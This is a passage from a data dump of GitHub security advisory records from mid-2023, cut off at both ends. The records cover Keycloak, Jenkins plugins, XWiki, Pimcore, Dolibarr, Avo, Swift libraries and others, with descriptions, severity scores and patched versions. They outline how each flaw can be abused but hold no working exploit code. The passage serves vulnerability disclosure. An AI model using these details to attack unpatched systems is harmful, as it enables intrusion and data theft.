'https://lists.sequoia-pgp.org/hyperkitty/list/announce@lists.sequoia-pgp.org/thread/SN2E3QRT4DMQ5JNEK6VIN6DJ5SH766DI/'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0038.html'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T01:58:04Z', 'nvd_published_at': None}" 1.4.0,GHSA-6pqf-c99p-758v,2023-06-30T20:41:50Z,2023-06-30T20:41:50Z,,['CVE-2023-36471'],org.xwiki.commons:xwiki-commons-xml's HTML sanitizer allows form elements in restricted,"### Impact The HTML sanitizer that is included in XWiki since version 14.6RC1 allowed form and input HTML tags. In the context of XWiki, this allows an attacker without script right to either create forms that can be used for phishing attacks or also in the context of a sheet, the attacker could add an input like `{{html}}{{/html}}` that would allow remote code execution when it is submitted by an admin (the sheet is rendered as part of the edit form). The attacker would need to ensure that the edit form looks plausible, though, which can be non-trivial as without script right the attacker cannot display the regular content of the document. ### Patches This has been patched in XWiki 14.10.6 and 15.2RC1 by removing the central form-related tags from the list of allowed tags. ### Workarounds An admin can manually disallow the tags by adding `form, input, select, textarea, button` to the configuration option `xml.htmlElementSanitizer.forbidTags` in the `xwiki.properties` configuration file. ### References * https://jira.xwiki.org/browse/XCOMMONS-2634 * https://github.com/xwiki/xwiki-commons/commit/99484d48e899a68a1b6e33d457825b776c6fe8c3 ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.commons:xwiki-commons-xml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.6-rc-1'}, {'fixed': '14.10.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.commons:xwiki-commons-xml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-1'}, {'fixed': '15.2-rc-1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-commons/security/advisories/GHSA-6pqf-c99p-758v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36471'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-commons/commit/99484d48e899a68a1b6e33d457825b776c6fe8c3'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-commons'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XCOMMONS-2634'}]","{'cwe_ids': ['CWE-74', 'CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:41:50Z', 'nvd_published_at': None}" 1.4.0,GHSA-5ghv-wxh9-7356,2023-06-14T20:33:37Z,2023-06-14T15:30:37Z,,['CVE-2023-35149'],Jenkins Digital.ai App Management Publisher Plugin missing permission checks,"Jenkins Digital.ai App Management Publisher Plugin 2.6 and earlier does not perform permission checks in several HTTP endpoints. This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins. Additionally, these HTTP endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:ease-plugin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35149'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-06-14/#SECURITY-2911'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/06/14/5'}]","{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T20:33:37Z', 'nvd_published_at': None}" 1.4.0,GHSA-3p62-6fjh-3p5h,2023-07-07T21:47:57Z,2023-06-30T20:30:50Z,,['CVE-2022-4361'],Keycloak vulnerable to cross-site scripting when validating URI-schemes on SAML and OIDC,"AssertionConsumerServiceURL is a Java implementation for SAML Service Providers (org.keycloak.protocol.saml). Affected versions of this package are vulnerable to Cross-site Scripting (XSS). AssertionConsumerServiceURL allows XSS when sending a crafted SAML XML request.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-services'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '21.1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/security/advisories/GHSA-3p62-6fjh-3p5h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-4361'}, {'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/commit/a1cfe6e24e5b34792699a00b8b4a8016a5929e3a'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2151618'}, {'type': 'PACKAGE', 'url': 'https://github.com/keycloak/keycloak'}]","{'cwe_ids': ['CWE-79', 'CWE-81'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:30:50Z', 'nvd_published_at': None}" 1.4.0,GHSA-q3q5-qvh5-cmw5,2023-06-27T21:59:07Z,2023-06-20T15:31:08Z,,['CVE-2020-21174'],liufee CMS File Upload vulnerability,File Upload vulnerability in liufee CMS v.2.0.7.1 allows a remote attacker to execute arbitrary code via the image suffix function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'feehi/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.8.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-21174'}, {'type': 'WEB', 'url': 'https://github.com/liufee/cms/issues/44'}, {'type': 'WEB', 'url': 'https://github.com/liufee/cms/commit/ecbfb0ca77874ead5b6e79b96a5e1f94e67475a9'}, {'type': 'PACKAGE', 'url': 'https://github.com/liufee/cms'}]","{'cwe_ids': ['CWE-434'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T22:09:57Z', 'nvd_published_at': None}" 1.4.0,GHSA-7mcw-xmx3-7p8m,2023-06-21T17:18:42Z,2023-06-13T18:30:39Z,,['CVE-2023-33695'],Insecure Temporary File in HuTool,Hutool v5.8.17 and below was discovered to contain an information disclosure vulnerability via the `File.createTempFile()` function at `/core/io/FileUtil.java`.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'cn.hutool:hutool-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.8.19'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33695'}, {'type': 'WEB', 'url': 'https://github.com/dromara/hutool/issues/3103'}, {'type': 'WEB', 'url': 'https://github.com/dromara/hutool/commit/c33550f703f5d1d7dd71ad2992d79a5e5532ce2c'}, {'type': 'PACKAGE', 'url': 'https://github.com/dromara/hutool'}]","{'cwe_ids': ['CWE-377', 'CWE-732'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T16:38:27Z', 'nvd_published_at': None}" 1.4.0,GHSA-f5h4-wmp5-xhg6,2023-06-30T20:29:25Z,2023-06-30T20:29:25Z,,['CVE-2023-2585'],Client Spoofing within the Keycloak Device Authorisation Grant,Under certain pre-conditions the vulnerability allows an attacker to spoof parts of the device flow and use a device_code to retrieve an access token for other OAuth clients.,[],"[{'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-services'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '21.1.2'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-server-spi-private'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '21.1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/security/advisories/GHSA-f5h4-wmp5-xhg6'}, {'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/commit/04e6244c387a1bde86184635a0049537611e3915'}, {'type': 'PACKAGE', 'url': 'https://github.com/keycloak/keycloak'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:29:25Z', 'nvd_published_at': None}" 1.4.0,GHSA-jf2f-hvxx-4rqx,2023-06-26T22:06:15Z,2023-06-16T18:30:33Z,,['CVE-2023-34660'],jeecg-boot unrestricted file upload vulnerability,jeecg-boot V3.5.0 has an unauthorized arbitrary file upload in `/jeecg-boot/jmreport/upload` interface.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jeecgframework.boot:jeecg-boot-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.5.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34660'}, {'type': 'WEB', 'url': 'https://github.com/jeecgboot/jeecg-boot/issues/4990'}, {'type': 'PACKAGE', 'url': 'https://github.com/jeecgboot/jeecg-boot'}]","{'cwe_ids': ['CWE-434'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-16T20:27:31Z', 'nvd_published_at': None}" 1.4.0,GHSA-3w3w-pxmm-2w2j,2023-06-16T22:12:34Z,2023-06-12T03:30:17Z,,['CVE-2020-36732'],crypto-js uses insecure random numbers,"The crypto-js package before 3.2.1 for Node.js generates random numbers by concatenating the string ""0."" with an integer, which makes the output more predictable than necessary.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'crypto-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36732'}, {'type': 'WEB', 'url': 'https://github.com/brix/crypto-js/issues/254'}, {'type': 'WEB', 'url': 'https://github.com/brix/crypto-js/issues/256'}, {'type': 'WEB', 'url': 'https://github.com/brix/crypto-js/pull/257/commits/e4ac157d8b75b962d6538fc0b996e5d4d5a9466b'}, {'type': 'WEB', 'url': 'https://github.com/brix/crypto-js/commit/e4ac157d8b75b962d6538fc0b996e5d4d5a9466b'}, {'type': 'PACKAGE', 'url': 'https://github.com/brix/crypto-js'}, {'type': 'WEB', 'url': 'https://github.com/brix/crypto-js/compare/3.2.0...3.2.1'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230706-0003/'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-CRYPTOJS-548472'}]","{'cwe_ids': ['CWE-330'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-13T12:44:48Z', 'nvd_published_at': None}" 1.4.0,GHSA-wmxx-2pvr-x7j6,2023-06-14T20:30:40Z,2023-06-14T15:30:37Z,,['CVE-2023-35145'],Jenkins Sonargraph Integration Plugin vulnerable to Stored Cross-site Scripting,"Jenkins Sonargraph Integration Plugin 5.0.1 and earlier does not correctly escape the file path and the project name for the Log file field form validation. This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:sonargraph-integration'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35145'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-06-14/#SECURITY-3155'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/06/14/5'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T20:29:11Z', 'nvd_published_at': None}" 1.4.0,GHSA-5cr9-5jx3-2g39,2023-06-09T15:03:08Z,2023-06-06T14:13:08Z,,['CVE-2023-34103'],avo vulnerable to Stored XSS (Cross Site Scripting) in html content based fields,"### Summary Some avo fields are vulnerable to XSS when rendering html based content. ### Details During the analysis of the web application, a rendered field was discovered that did not filter JS / HTML tags in a safe way and can be abused to execute js code on a client side. The trix field uses the trix editor in the backend to edit rich text data which basically operates with html tags. To display the stored data in a rendered view, the HasHTMLAttributes concern is used. This can be exploited by an attacker to store javascript code in any trix field by intercepting the request and modifying the post data, as the trix editor does not allow adding custom html or js tags on the frontend. ### PoC ![image](https://user-images.githubusercontent.com/26464774/243434868-47857054-9b20-437f-842f-0750d53c9b0e.png) _Adding javascript in the post request which is used when editing a ""post"" resource (body is declared as a trix field)_ ![image](https://user-images.githubusercontent.com/26464774/243435009-948593a0-5179-4368-977c-ec36d2373925.png) _Successful execution of JS code on live demo environment_ ### Impact Unlike non-persistent XSS, persistent XSS does not require a social engineering phase. Victims of this attack do not need to be tricked into clicking a link or something like that. However, by exploiting such a vulnerability on this particular target, attackers may be able to gain access to accounts that require special protection, such as administrators of the web service, which is what Avo is primarily intended to be used for. ### Recommendation The content of a field that contains html code should be sanitized using the according rails helper which uses a whitelist of known-safe tags and attributes. Also this security consideration should be applied to the “as_html” attribute as well because it may contain user controlled input as well. https://api.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'avo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.33.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.33.2'}}, {'package': {'ecosystem': 'RubyGems', 'name': 'avo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0.pre1'}, {'last_affected': '3.0.0.pre12'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/avo-hq/avo/security/advisories/GHSA-5cr9-5jx3-2g39'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34103'}, {'type': 'WEB', 'url': 'https://github.com/avo-hq/avo/commit/7891c01e1fba9ca5d7dbccc43d27f385e5d08563'}, {'type': 'PACKAGE', 'url': 'https://github.com/avo-hq/avo'}, {'type': 'WEB', 'url': 'https://github.com/avo-hq/avo/releases/tag/v2.33.3'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/avo/CVE-2023-34103.yml'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T14:13:08Z', 'nvd_published_at': None}" 1.4.0,GHSA-x2w4-c67p-g44j,2023-06-07T15:08:08Z,2023-06-06T21:30:18Z,,['CVE-2023-2801'],Grafana Missing Synchronization vulnerability,"Grafana is an open-source platform for monitoring and observability. Using public dashboards users can query multiple distinct data sources using mixed queries. However such query has a possibility of crashing a Grafana instance. The only feature that uses mixed queries at the moment is public dashboards, but it's also possible to cause this by calling the query API directly. This might enable malicious users to crash Grafana instances through that endpoint. Users may upgrade to version 9.4.12 and 9.5.3 to receive a fix.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.4.12'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.5.0'}, {'fixed': '9.5.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2801'}, {'type': 'PACKAGE', 'url': 'https://github.com/grafana/grafana'}, {'type': 'WEB', 'url': 'https://grafana.com/security/security-advisories/cve-2023-2801/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230706-0002/'}]","{'cwe_ids': ['CWE-662', 'CWE-820'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-07T15:08:08Z', 'nvd_published_at': None}" 1.4.0,GHSA-7fj7-39wj-c64f,2023-06-07T16:01:53Z,2023-06-07T16:01:53Z,,['CVE-2022-3215'],SwiftNIO vulnerable to Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting'),"`NIOHTTP1` and projects using it for generating HTTP responses, including SwiftNIO, can be subject to a HTTP Response Injection attack. This occurs when a HTTP/1.1 server accepts user generated input from an incoming request and reflects it into a HTTP/1.1 response header in some form. A malicious user can add newlines to their input (usually in encoded form) and ""inject"" those newlines into the returned HTTP response. This capability allows users to work around security headers and HTTP/1.1 framing headers by injecting entirely false responses or other new headers. The injected false responses may also be treated as the response to subsequent requests, which can lead to XSS, cache poisoning, and a number of other flaws. This issue was resolved by adding a default channel handler that polices outbound headers. This channel handler is added by default to channel pipelines, but can be removed by users if they are doing this validation themselves.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/apple/swift-nio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.41.0'}, {'fixed': '2.42.0'}]}]}, {'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/apple/swift-nio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.39.0'}, {'fixed': '2.39.1'}]}]}, {'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/apple/swift-nio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.29.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/apple/swift-nio/security/advisories/GHSA-7fj7-39wj-c64f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-3215'}, {'type': 'WEB', 'url': 'https://github.com/apple/swift-nio/commit/a16e2f54a25b2af217044e5168997009a505930f'}, {'type': 'PACKAGE', 'url': 'https://github.com/apple/swift-nio'}]","{'cwe_ids': ['CWE-113', 'CWE-74'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-07T16:01:53Z', 'nvd_published_at': '2022-09-28T20:15:00Z'}" 1.4.0,GHSA-46g3-f9r8-xj4v,2023-06-06T01:51:34Z,2023-06-06T01:51:34Z,,['CVE-2023-2984'],Pimcore vulnerable to Pre-Auth Path Traversal in pimcore_log parameter,"### Impact A path traversal vulnerability exists in the CMS, which allows an attacker to overwrite or modify sensitive files by manipulating the `pimcore_log` parameter.This can lead to potential denial of service---key file overwrite. The impact of this vulnerability allows attackers to: - Overwrite or modify sensitive files, potentially leading to unauthorized access, privilege escalation, or disclosure of confidential information. - Tamper with system settings by modifying key files, such as the hosts file in Windows or configuration files for other services. - Cause a denial of service (DoS) if critical system files are overwritten or deleted. The consequences of exploiting this vulnerability can be detrimental to the confidentiality, integrity, and availability of the affected system. It's crucial to address this vulnerability to protect sensitive data and ensure the proper functioning of the system. ### Patches Update to version 10.5.22 or apply this patch manually https://github.com/pimcore/pimcore/commit/e8dbc4da58ae86618bceb67ed35ce23e5e54d2ed.patch ### Workarounds Apply patch https://github.com/pimcore/pimcore/commit/e8dbc4da58ae86618bceb67ed35ce23e5e54d2ed.patch manually. ### References https://huntr.dev/bounties/5df8b951-e2f1-4548-a7e3-601186e1b191/","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.22'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-46g3-f9r8-xj4v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2984'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/e8dbc4da58ae86618bceb67ed35ce23e5e54d2ed'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/5df8b951-e2f1-4548-a7e3-601186e1b191'}]","{'cwe_ids': ['CWE-29'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T01:51:34Z', 'nvd_published_at': None}" 1.4.0,GHSA-mrcj-5qxr-vhp2,2023-07-07T16:28:14Z,2023-06-30T18:31:01Z,,['CVE-2023-34840'],angular-ui-notification Cross-site Scripting vulnerability,"angular-ui-notification v0.1.0, v0.2.0, and v0.3.6 was discovered to contain a cross-site scripting (XSS) vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'angular-ui-notification'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.1.0'}, {'last_affected': '0.3.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34840'}, {'type': 'WEB', 'url': 'https://github.com/Xh4H/CVE-2023-34840'}, {'type': 'PACKAGE', 'url': 'https://github.com/alexcrack/angular-ui-notification'}, {'type': 'WEB', 'url': 'http://alexcrack.com'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:35:15Z', 'nvd_published_at': None}" 1.4.0,GHSA-wmff-grcw-jcfm,2023-06-21T18:35:21Z,2023-06-21T18:35:21Z,,['CVE-2023-34460'],Tauri vulnerable to Regression on Filesystem Scope Checks for Dotfiles,"### Impact The 1.4.0 release includes a regression on the filesystem scope check for dotfiles on Linux and macOS. Previously dotfiles (eg. `$HOME/.ssh/`) were not implicitly allowed by the glob wildcard scopes (eg. `$HOME/*`), but a regression was introduced when a configuration option for this behavior was implemented and dotfiles were implicitly allowed. Only Tauri applications using wildcard scopes in the `fs` endpoint are affected. Only macOS and Linux systems are affected. ### Patches The regression has been patched on `v1.4.1`. ### Workarounds There are no known workarounds at this time, users should update to `v1.4.1` immediately. ### References See the [original advisory](https://github.com/tauri-apps/tauri/security/advisories/GHSA-6mv3-wm7j-h4w5) for more information. ### For more Information If you have any questions or comments about this advisory: Open an issue in tauri Email us at [security@tauri.app](mailto:security@tauri.app)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'tauri'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.4.1'}]}], 'versions': ['1.4.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tauri-apps/tauri/security/advisories/GHSA-6mv3-wm7j-h4w5'}, {'type': 'WEB', 'url': 'https://github.com/tauri-apps/tauri/security/advisories/GHSA-wmff-grcw-jcfm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34460'}, {'type': 'WEB', 'url': 'https://github.com/tauri-apps/tauri/pull/6969#discussion_r1232018347'}, {'type': 'WEB', 'url': 'https://github.com/tauri-apps/tauri/pull/7227'}, {'type': 'WEB', 'url': 'https://github.com/tauri-apps/tauri/commit/066c09a6ea06f42f550d090715e06beb65cd5564'}, {'type': 'PACKAGE', 'url': 'https://github.com/tauri-apps/tauri'}]","{'cwe_ids': ['CWE-285'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T18:35:21Z', 'nvd_published_at': None}" 1.4.0,GHSA-fpvg-m786-h5vr,2023-06-26T20:55:12Z,2023-06-13T18:30:39Z,,['CVE-2023-33568'],Dolibarr vulnerable to unauthenticated database access,"An issue in Dolibarr v16.0.0 to v16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'dolibarr/dolibarr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '16.0.0'}, {'fixed': '16.0.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33568'}, {'type': 'WEB', 'url': 'https://github.com/Dolibarr/dolibarr/commit/bb7b69ef43673ed403436eac05e0bc31d5033ff7'}, {'type': 'WEB', 'url': 'https://github.com/Dolibarr/dolibarr/commit/be82f51f68d738cce205f4ce5b469ef42ed82d9e'}, {'type': 'PACKAGE', 'url': 'https://github.com/Dolibarr/dolibarr'}, {'type': 'WEB', 'url': 'https://www.dolibarr.org/forum/t/dolibarr-16-0-security-breach/23471'}, {'type': 'WEB', 'url': 'https://www.dolibarr.org/forum/t/dolibarr-16-0-security-breach/23471/1'}, {'type': 'WEB', 'url': 'https://www.dsecbypass.com/en/dolibarr-pre-auth-contact-database-dump/'}]","{'cwe_ids': ['CWE-200', 'CWE-552'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T16:23:01Z', 'nvd_published_at': None}" 1.4.0,GHSA-239c-6cv2-wwx8,2023-06-07T16:07:36Z,2023-06-07T16:07:36Z,,['CVE-2022-1642'],Swift-corelibs-foundation denial of service in JSON decoding with JSONDecoder,"### Impact A program using swift-corelibs-foundation is vulnerable to a denial of service attack caused by a potentially malicious source producing a JSON document containing a type mismatch. This vulnerability is caused by the interaction between a deserialization mechanism offered by the Swift standard library, the Codable protocol; and the JSONDecoder class offered by swift-corelibs-foundation, which can deserialize types that adopt the Codable protocol based on the content of a provided JSON document. When a type that adopts Codable requests the initialization of a field with an integer value, the JSONDecoder class uses a type-erased container with different accessor methods to attempt and coerce a corresponding JSON value and produce an integer. In the case the JSON value was a numeric literal with a floating-point portion, JSONDecoder used different type-eraser methods during validation than it did during the final casting of the value. The checked casting produces a deterministic crash due to this mismatch. The JSONDecoder class is often wrapped by popular Swift-based web frameworks to parse the body of HTTP requests and perform basic type validation. This makes the attack low-effort: sending a specifically crafted JSON document during a request to these endpoints will cause them to crash. The attack does not have any confidentiality or integrity risks in and of itself; the crash is produced deterministically by an abort function that ensures that execution does not continue in the face of this violation of assumptions. However, unexpected crashes can lead to violations of invariants in services, so it's possible that this attack can be used to trigger error conditions that escalate the risk. Producing a denial of service may also be the goal of an attacker in itself. ### Resolution This issue is solved in Swift 5.6.2 for Linux and Windows. This issue was solved by ensuring that the same methods are invoked both when validating and during casting, so that no type mismatch occurs. Swift for Linux and Windows versions are not ABI-interchangeable. To upgrade a service, its owner must update to this version of the Swift toolchain, then recompile and redeploy their software. The new version of Swift includes an updated swift-corelibs-foundation package. The resolution is also included in recent development snapshots of Swift available on swift.org for those platforms. Versions of Swift running on Darwin-based operating systems are not affected. ### Workarounds Users that can control which payload is parsed with JSONDecoder can ensure that fields that are intended to initialize Swift integer types use a JSON numeric constant without a fractional part. This will avoid the crash, but it is rare that a user has full control on the JSON payload they will parse. As a workaround, users that can alter their current software but cannot perform an upgrade can perform JSON parsing directly (e.g., through the JSONSerialization class) rather than using the JSONDecoder class. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/apple/swift-corelibs-foundation'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.6.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/apple/swift-corelibs-foundation/security/advisories/GHSA-239c-6cv2-wwx8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-1642'}, {'type': 'WEB', 'url': 'https://github.com/apple/swift-corelibs-foundation/commit/b541491f73b39007a38f3ff5a0cbe89d09ef1614'}, {'type': 'PACKAGE', 'url': 'https://github.com/apple/swift-corelibs-foundation'}]","{'cwe_ids': ['CWE-704'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-07T16:07:36Z', 'nvd_published_at': '2022-06-16T17:15:00Z'}" 1.4.0,GHSA-hcpw-v727-64qh,2023-06-20T16:35:50Z,2023-06-19T21:30:21Z,,['CVE-2023-3315'],Jenkins Team Concert Plugin does not perform permission checks in methods implementing form 